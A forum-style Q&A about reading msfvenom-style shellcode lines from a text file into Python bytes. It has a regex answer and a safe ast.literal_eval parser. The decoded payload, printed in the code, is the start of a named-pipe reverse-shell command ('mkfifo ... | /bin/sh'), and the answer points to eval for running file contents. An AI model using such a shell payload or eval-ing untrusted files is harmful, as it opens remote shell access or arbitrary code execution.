I have a text file containing shellcode that looks like this:
buf += b"\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x73"
buf += b"\x35\x35\x20\x30\x3c\x2f\x74\x6d\x70\x2f\x73\x61\x6b"
buf += b"\x6e\x20\x7c\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20\x3e"
and I want to automatically read this shellcode and assign it to a variable in my Python script so I can use it. I wrote a script that looks like this:
myfile = open("shellcode.txt", "rt")
a = myfile.read()
myfile.close()
a = a.replace('buf += b"', '')
a = a.replace('buf = b""', '')
a = a.replace('"', '')
a = a.replace(' ', '')
a = a.replace('\n', '')
buf = ""
buf = str.encode(a)
to read the content of the file, strip the characters that I don't need so that only the raw shellcode is left, and convert it to bytes.
I also tried with bytes, bytearray, and buf += b"%s" % (a).
So whenever I print buf it outputs the shellcode as it is, but when I copy the content of shellcode.txt, paste it into the Python script and print(buf), it prints the decoded version of the shellcode.
So if this method doesn't work, can I read the file and execute every line of it as if it were part of the script?
Here is a suggestion using a regex to extract the byte values. regex101 is a very good place to play with regexes and debug them.
import re

# Match one `\xNN` escape and capture the two hex digits, without the leading `\x`.
# regex101.com is a very good reference to analyse regex patterns.
BYTE_REGEX = r"\\x([0-9a-fA-F]{2})"

# retrieve text
with open('shellcode.txt', 'r') as f:
    file_text = f.read()

buf_list = []
for byte in re.findall(BYTE_REGEX, file_text):
    # scan string and treat all bytes one by one
    buf_list.append(int(byte, base=16))

result = bytearray(buf_list)
print(result)
# bytearray(b'mkfifo /tmp/s55 0</tmp/sakn | /bin/sh >')
There are also mechanisms to execute Python code given as text; see eval.
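An added example (not part of the question or the answer above): a small parser for the `buf = b""` / `buf += b"..."` line format that rebuilds the bytes with `ast.literal_eval`, which parses literals only and never runs code, so the file contents are not handed to `eval`. The sample text is constructed here to mirror the question's format, and the asker's `str.encode` approach is kept alongside to show why it left the backslashes in place.

```python
import ast
import re

# Constructed sample text mirroring the question's file layout (not the asker's real file).
SAMPLE = r'''buf = b""
buf += b"\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x73"
buf += b"\x35\x35\x20\x30\x3c\x2f\x74\x6d\x70\x2f\x73\x61\x6b"
buf += b"\x6e\x20\x7c\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20\x3e"
'''

# One `buf = b"..."` or `buf += b"..."` line; the group captures just the bytes literal.
LINE_RE = re.compile(r'^\s*buf\s*\+?=\s*(b"(?:[^"\\]|\\.)*")\s*$')


def naive_strip(text: str) -> bytes:
    """The question's approach: strip the wrapper text and call str.encode().

    This keeps the four characters `\\x6d` literally instead of producing the
    single byte 0x6d, which is why the printed output still showed `\\x..`.
    """
    a = text.replace('buf += b"', '').replace('buf = b""', '')
    a = a.replace('"', '').replace(' ', '').replace('\n', '')
    return a.encode()


def parse_buf_file(text: str) -> bytes:
    """Rebuild the bytes the generator script would have assembled in `buf`.

    Each bytes literal is parsed with ast.literal_eval, which evaluates
    literals only and never executes code, unlike eval() on file contents.
    Any line that is not a plain `buf [+]= b"..."` assignment is rejected.
    """
    out = bytearray()
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if m is None:
            raise ValueError(f"line {lineno}: not a buf assignment: {line!r}")
        out += ast.literal_eval(m.group(1))  # b"..." source text -> bytes
    return bytes(out)


if __name__ == "__main__":
    print(naive_strip(SAMPLE)[:12])   # b'\\x6d\\x6b\\x66' -- backslashes kept
    print(parse_buf_file(SAMPLE))     # b'mkfifo /tmp/s55 0</tmp/sakn | /bin/sh >'
```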